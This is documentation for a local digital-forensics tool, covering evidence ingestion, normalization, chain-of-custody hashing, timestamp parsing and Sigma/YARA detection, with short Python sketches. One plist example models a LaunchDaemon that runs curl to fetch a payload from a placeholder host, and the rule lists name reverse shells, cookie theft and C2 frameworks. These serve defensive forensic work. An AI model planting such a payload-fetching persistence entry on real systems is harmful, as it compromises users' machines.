Overview
Chronos-DFIR supports ingestion of forensic artifacts (EVTX, MFT, PLIST) and various report formats (CSV, XLSX, JSON, Parquet, SQLite) through a unified drag-and-drop interface. All files pass through a robust normalization and parsing engine to create a unified timeline structure. All ingested data is processed locally — Chronos-DFIR requires no internet connection for evidence processing and detection.
Supported File Formats
Native Forensic Artifacts
EVTX - Windows Event Logs
Format: Windows Event Log binary
Processing: Optimized EVTX parser extracts:
- EventID, Level, Provider
- Computer, User, timestamps
- EventData fields (CommandLine, ProcessName, IPs, etc.)
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx
MFT - Master File Table
Format: NTFS Master File Table binary
Processing: Parses `$STANDARD_INFORMATION` attributes from MFT records:
- Real FILETIME timestamps (Created, Modified, MFT Modified, Accessed)
- File paths and metadata
- Zero timestamp fabrication (forensic integrity guaranteed)
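The FILETIME values in `$STANDARD_INFORMATION` are 64-bit counts of 100-nanosecond intervals since 1601-01-01 UTC. The conversion can be sketched with the stdlib (an illustration of the technique, not the code in `mft_engine.py`):

```python
from datetime import datetime, timedelta, timezone

# Windows FILETIME epoch: 1601-01-01 00:00:00 UTC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(filetime: int) -> datetime:
    """Convert a 64-bit FILETIME (100-ns ticks since 1601) to a UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)

# The Unix epoch (1970-01-01) expressed as a FILETIME
print(filetime_to_datetime(116444736000000000).isoformat())  # 1970-01-01T00:00:00+00:00
```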
Extract with `MFTECmd.exe` or extract directly.
PLIST - macOS Property Lists
Format: macOS Property List (binary or XML)
Processing: Detects and parses:
- LaunchAgents and LaunchDaemons (persistence mechanisms)
- ProgramArguments, RunAtLoad, KeepAlive flags
- Bundle identifiers and signatures
/Library/LaunchDaemons/*.plist
~/Library/LaunchAgents/*.plist
/System/Library/LaunchDaemons/*.plist
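LaunchAgent/LaunchDaemon parsing can be sketched with the stdlib `plistlib`, which handles both binary and XML plists. This is a simplified illustration, not Chronos's actual parser; the plist content below is a made-up example:

```python
import plistlib

# A minimal LaunchDaemon-style plist, serialized as binary to show auto-detection
raw = plistlib.dumps({
    "Label": "com.example.persist",
    "ProgramArguments": ["/usr/bin/curl", "http://example.com/payload"],
    "RunAtLoad": True,
    "KeepAlive": False,
}, fmt=plistlib.FMT_BINARY)

job = plistlib.loads(raw)  # plistlib.loads detects binary vs XML automatically
print(job["Label"], job["ProgramArguments"][0], job["RunAtLoad"])
```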
Report Formats
CSV / TSV
Ingests reports from Plaso, KAPE, EDRs, and custom forensic tools.
Features:
- Automatic column detection and normalization
- Handles headerless CSV (e.g., `ls -la` output)
- UTF-8 and UTF-8 lossy encoding support
- Whitespace-delimited parsing for `pslist` and log files
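Headerless-CSV handling can be approximated with a simple heuristic: treat the first row as a header only if none of its cells look numeric, and synthesize column names otherwise. This is an illustrative sketch, not Chronos's actual detection logic:

```python
import csv
import io

def _looks_numeric(cell: str) -> bool:
    try:
        float(cell)
        return True
    except ValueError:
        return False

def read_with_header_detection(text: str):
    """Return (columns, rows); synthesize Field_N names when row 1 looks like data."""
    rows = list(csv.reader(io.StringIO(text)))
    has_header = not any(_looks_numeric(cell) for cell in rows[0])
    if has_header:
        return rows[0], rows[1:]
    return [f"Field_{i + 1}" for i in range(len(rows[0]))], rows

print(read_with_header_detection("4096,a.txt\n512,b.txt\n")[0])  # ['Field_1', 'Field_2']
```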
Excel (.xlsx)
Reads Excel spreadsheets with automatic sheet detection.
Best for: Analyst-curated reports, EDR exports
First sheet is processed by default. Multi-sheet workbooks use the first populated sheet.
JSON / JSONL / NDJSON
Parses structured event logs in JSON format.
Processing:
- Auto-flattens nested JSON structures
- Supports line-delimited JSON (JSONL/NDJSON)
- Handles arrays and nested objects
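Auto-flattening nested JSON into scalar columns can be sketched as a recursive walk. The dot-separated key naming below is an assumption for illustration, not necessarily the convention Chronos uses:

```python
import json

def flatten(obj, prefix=""):
    """Flatten nested dicts/lists into dot-separated scalar columns."""
    out = {}
    if isinstance(obj, dict):
        for key, value in obj.items():
            out.update(flatten(value, f"{prefix}{key}."))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            out.update(flatten(value, f"{prefix}{i}."))
    else:
        out[prefix.rstrip(".")] = obj
    return out

# One JSONL event with nested EventData
line = '{"Event": {"System": {"EventID": 4688}, "EventData": {"CommandLine": "whoami"}}}'
print(flatten(json.loads(line)))
# {'Event.System.EventID': 4688, 'Event.EventData.CommandLine': 'whoami'}
```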
Parquet
Columnar format for massive datasets.
Performance: Streaming ingestion via Polars `scan_parquet` — handles multi-GB files without loading them into RAM.
Best for: Big Data hunting platforms, EDR full dataset exports
SQLite (.db)
Reads SQLite databases directly.
Processing:
- Auto-detects tables (prioritizes `events`, `logs`, `timeline`, `entries`)
- Extracts the first non-system table if no standard table is found
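The table-selection logic can be sketched with the stdlib `sqlite3` module. This is a simplified illustration of the priority order described above, not the actual implementation:

```python
import sqlite3

PREFERRED = ["events", "logs", "timeline", "entries"]

def pick_table(conn: sqlite3.Connection) -> str:
    """Pick an ingestion table: a preferred name first, else the first non-system table."""
    names = [row[0] for row in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name")]
    for wanted in PREFERRED:
        for name in names:
            if name.lower() == wanted:
                return name
    for name in names:
        if not name.startswith("sqlite_"):  # skip SQLite's internal tables
            return name
    raise ValueError("no usable table found")

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE metadata (k TEXT)")
conn.execute("CREATE TABLE timeline (Time TEXT, Message TEXT)")
print(pick_table(conn))  # timeline
```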
Ingestion Workflow
Select Evidence File
Option 1: Drag & Drop
Drag forensic artifacts directly onto the Chronos-DFIR interface.
Option 2: File Browser
Click Select File to open your operating system’s file picker.
Process Artifact
Click Process Artifact to start ingestion.
Backend processing:
- SHA256 hash computed during streaming upload (chain of custody)
- Format detection based on file extension and content fingerprinting
- Parsing engine extracts structured data:
  - EVTX: `evtx_engine.py`
  - MFT: `mft_engine.py` with real FILETIME parsing
  - Multi-format: `engine/ingestor.py` with Polars streaming
- Normalization:
  - Timestamps → `Time` column (ISO 8601)
  - EventID detection (Windows Event IDs, custom identifiers)
  - IP addresses, usernames, paths extracted to standardized columns
- Detection rules applied:
  - Sigma rules (86+ rules) evaluated row-by-row
  - YARA rules (7 files) scan CommandLine, paths, and message fields
  - MITRE ATT&CK mapping enriches detections with TTPs
Processing time: ~10K events/second on Apple Silicon M4 (vectorized Polars engine).
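Hashing during the upload stream means the evidence is read exactly once: each chunk updates the digest as it arrives. A stdlib sketch of the technique (illustrative, not the actual backend code):

```python
import hashlib
import tempfile

def stream_hash(path: str, chunk_size: int = 1024 * 1024) -> str:
    """SHA256 a file in fixed-size chunks; hashing rides along with the upload stream."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        while chunk := fh.read(chunk_size):
            digest.update(chunk)  # in the real flow, each chunk is also written to storage
    return digest.hexdigest()

# NIST test vector: SHA256("abc")
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"abc")
print(stream_hash(tmp.name))
# ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
```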
Review Timeline
Once processed, the unified timeline grid displays:
- Timestamp column (pinned, sortable)
- No. (row counter for navigation)
- Tag (checkbox for manual row selection)
- All detected columns from the source file
- Enrichment columns: `Sigma_Tag`, `YARA_Match`, `MITRE_Technique`
Best Practices
Evidence Handling
Chain of Custody
Chronos-DFIR computes the SHA256 hash during upload (zero extra I/O).
Accessing the hash:
- Upload response includes a `chain_of_custody` field with SHA256 + file size
- Export Context (JSON) includes the hash in the metadata section
- Original evidence files remain unmodified
- Processed CSV stored in the `upload/` directory with normalized schema
- No timestamp fabrication (MFT timestamps parsed from real `$STANDARD_INFORMATION` structs)
Large File Handling
Files > 50MB: Streaming ingestion is used automatically.
Implementation: `engine/ingestor.py`
Supported for: Parquet, CSV, TSV, JSON (line-delimited)
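Polars `scan_parquet` streams natively; the same constant-memory idea for line-delimited formats can be sketched in plain Python. This is an illustrative analogue, not the code in `engine/ingestor.py`, and the names are hypothetical:

```python
def iter_batches(path: str, batch_size: int = 50_000):
    """Yield lists of lines so a multi-GB file is never fully resident in RAM."""
    batch = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for line in fh:
            batch.append(line.rstrip("\n"))
            if len(batch) >= batch_size:
                yield batch
                batch = []
    if batch:
        yield batch  # final partial batch

# Usage: parse, normalize, and run detections per batch, then discard it
# for batch in iter_batches("huge_export.jsonl"):
#     handle(batch)
```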
Multi-Source Ingestion
Current workflow (single-file mode):
- Click Hard Reset ⟲ before loading a new file to prevent cross-contamination
- Each ingestion purges the previous DataFrame, UI state, and LocalStorage
Planned (case-based workflow):
- Loading multiple files per investigation
- Cross-file correlation engine for a unified multi-source timeline
- Phase-based file organization within cases
File Preparation Tips
Clean Column Names
While Chronos normalizes column headers, cleaner source data improves accuracy.
Good: `Timestamp`, `Time`, `EventTime`, `CreationTime`, `EventID`, `Event ID`, `event_id`
Normalization examples: `_time` → `Time`, `_id` → `Original_Id`, `123` → `Field_123`
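The mappings above can be sketched as a small normalization function (illustrative only; the real rules live in Chronos's engine):

```python
import re

def normalize_header(name: str) -> str:
    """Apply the example mappings: _time→Time, _id→Original_Id, 123→Field_123."""
    special = {"_time": "Time", "_id": "Original_Id"}
    if name in special:
        return special[name]
    if re.fullmatch(r"\d+", name):  # purely numeric headers get a Field_ prefix
        return f"Field_{name}"
    return name.strip()

print([normalize_header(h) for h in ["_time", "_id", "123", " EventID "]])
# ['Time', 'Original_Id', 'Field_123', 'EventID']
```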
Include Forensic Context Columns
For best detection accuracy, ensure your export includes the 27 forensic context columns (`engine/sigma_engine.py` line 283). These columns enrich Sigma detection evidence tables automatically.
Timestamp Format
Supported formats (auto-detected):
- ISO 8601: `2024-03-08T14:23:45.123Z`
- Windows FILETIME: `132945678901234567`
- Unix epoch: `1709912625`
- Human-readable: `2024-03-08 14:23:45.123-0800`
Recognized timestamp column names: `Time`, `Timestamp`, `DateTime`, `EventTime`, `CreationTime`, `CreateTime`, `ModifiedTime`, `AccessedTime`, `@timestamp`, `_time`, `Timezone` (XDR fallback)
If no timestamp column is detected, Chronos operates in “artifact mode” (distribution charts replace timeline histogram).
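Auto-detection across these formats can be sketched as a magnitude heuristic: 18-digit integers are FILETIME, shorter integers are Unix epoch, everything else tries ISO 8601. The thresholds below are illustrative assumptions, not Chronos's actual logic:

```python
from datetime import datetime, timedelta, timezone

def parse_timestamp(value: str) -> datetime:
    """Best-effort multi-format timestamp parsing (simplified heuristic sketch)."""
    s = value.strip()
    if s.isdigit():
        n = int(s)
        if n > 10**17:  # 18-digit magnitude: Windows FILETIME (100-ns ticks since 1601)
            return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=n // 10)
        return datetime.fromtimestamp(n, tz=timezone.utc)  # Unix epoch seconds
    # ISO 8601 (rewrite trailing 'Z' for Pythons older than 3.11)
    return datetime.fromisoformat(s.replace("Z", "+00:00"))

print(parse_timestamp("1709912625").isoformat())
```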
Troubleshooting Common Issues
Upload Fails or Hangs
Symptom: File upload progress bar stalls or shows an error.
Solutions:
File Size Limits
Browser limit: 6GB+ files may trigger browser memory limits.
Workaround:
- Split large EVTX files
- Convert to Parquet (streaming-friendly)
Encoding Issues
Symptom: Garbled text, missing characters
Cause: Non-UTF-8 file encoding
Fix: The ingestor auto-retries with `encoding='utf8-lossy'`. If issues persist, pre-convert the file to UTF-8.
No Events Showing After Processing
Symptom: Grid shows “No data” despite successful upload.
Causes:
Check Time Range Filter
Filters may be hiding all events.
Fix: Click Reset Filters ⟳ to clear time range, global search, and column filters.
Empty Source File
File may contain only headers or malformed data.
Verify:
- Check backend logs (browser DevTools → Console)
- Look for parsing errors: `"row_count": 0` in the upload response
Timestamps Not Parsing
Symptom: `Time` column shows original strings instead of formatted timestamps
Solutions:
Column Not Detected
Chronos looks for columns named `Time`, `Timestamp`, `DateTime`, `EventTime`, etc.
Fix: Rename your timestamp column before upload.
Custom Timestamp Format
If your timestamps use a non-standard format, they may not auto-parse.
Workaround: Pre-convert to ISO 8601.
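Both fixes (renaming the column and converting values to ISO 8601) can be done in one pre-processing pass with the stdlib `csv` module. The column name and date format below are made-up examples:

```python
import csv
import io
from datetime import datetime

def fix_timestamps(text: str, source_col: str, fmt: str) -> str:
    """Rename a custom timestamp column to 'Time' and convert values to ISO 8601."""
    rows = list(csv.DictReader(io.StringIO(text)))
    fields = ["Time" if f == source_col else f for f in rows[0].keys()]
    out = io.StringIO()
    writer = csv.DictWriter(out, fieldnames=fields)
    writer.writeheader()
    for row in rows:
        raw = row.pop(source_col)
        row["Time"] = datetime.strptime(raw, fmt).isoformat()
        writer.writerow(row)
    return out.getvalue()

csv_in = "event_date,msg\n08/03/2024 14:23:45,logon\n"
print(fix_timestamps(csv_in, "event_date", "%d/%m/%Y %H:%M:%S"))
```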
Sigma/YARA Rules Not Detecting
Symptom: No `Sigma_Tag` or `YARA_Match` columns despite known malicious activity
Verify rule coverage:
Check Field Names
Sigma rules expect specific field names (case-insensitive).
Example: `rules/sigma/mitre/ta0002_execution/T1059_001_powershell_encoded.yml` requires the columns `Image` and `CommandLine`. If your data uses different names (`Process` instead of `Image`), rules won’t match.
Fix: Rename columns before ingestion or customize the rules in `rules/sigma/`.
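A pre-ingestion column check can be sketched as follows. The alias table is a hypothetical example of common EDR field names, not a mapping Chronos ships with:

```python
# Required fields for the example process-creation rule above
REQUIRED = {"Image", "CommandLine"}
# Hypothetical aliases some EDR exports use for the same data
RENAMES = {"Process": "Image", "ProcessCommandLine": "CommandLine"}

def prepare_columns(columns):
    """Rename known aliases, then warn about rule fields that are still missing."""
    renamed = [RENAMES.get(c, c) for c in columns]
    missing = REQUIRED - set(renamed)
    if missing:
        print(f"warning: rules needing {sorted(missing)} will not match")
    return renamed

print(prepare_columns(["Time", "Process", "CommandLine"]))
# ['Time', 'Image', 'CommandLine']
```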
Rule Categories
86+ Sigma rules organized by MITRE tactic:
- `rules/sigma/mitre/ta0001_initial_access/` — Phishing, exploit detection
- `rules/sigma/mitre/ta0002_execution/` — PowerShell, WMI, scripting
- `rules/sigma/mitre/ta0003_persistence/` — Registry, scheduled tasks, services
- `rules/sigma/artifacts/` — Prefetch, ShimCache, AmCache, SRUM, UserAssist
- `rules/sigma/browser/` — History manipulation, cookie theft
- `rules/sigma/linux/` — Reverse shells, SSH, sudo abuse, auditd
- `rules/sigma/macos/` — TCC bypass, Gatekeeper, Authorization plugins

YARA rules (`rules/yara/`):
- `ransomware/` — LockBit, QILIN, generic ransomware patterns
- `c2_frameworks/` — Cobalt Strike, Sliver, Meterpreter
- `infostealers/` — Generic infostealer patterns
- `lolbin/` — Living-off-the-land binary abuse
- `webshells/` — PHP/ASP/JSP webshells
- `macos/` — macOS persistence mechanisms
Next Steps
Filtering & Searching
Learn to navigate and filter your timeline with global search, time ranges, and column management
Detection Rules
Understand Sigma and YARA rule evaluation, and create custom detection logic
Case Management
Organize multi-file investigations with cases, phases, journal entries, and correlation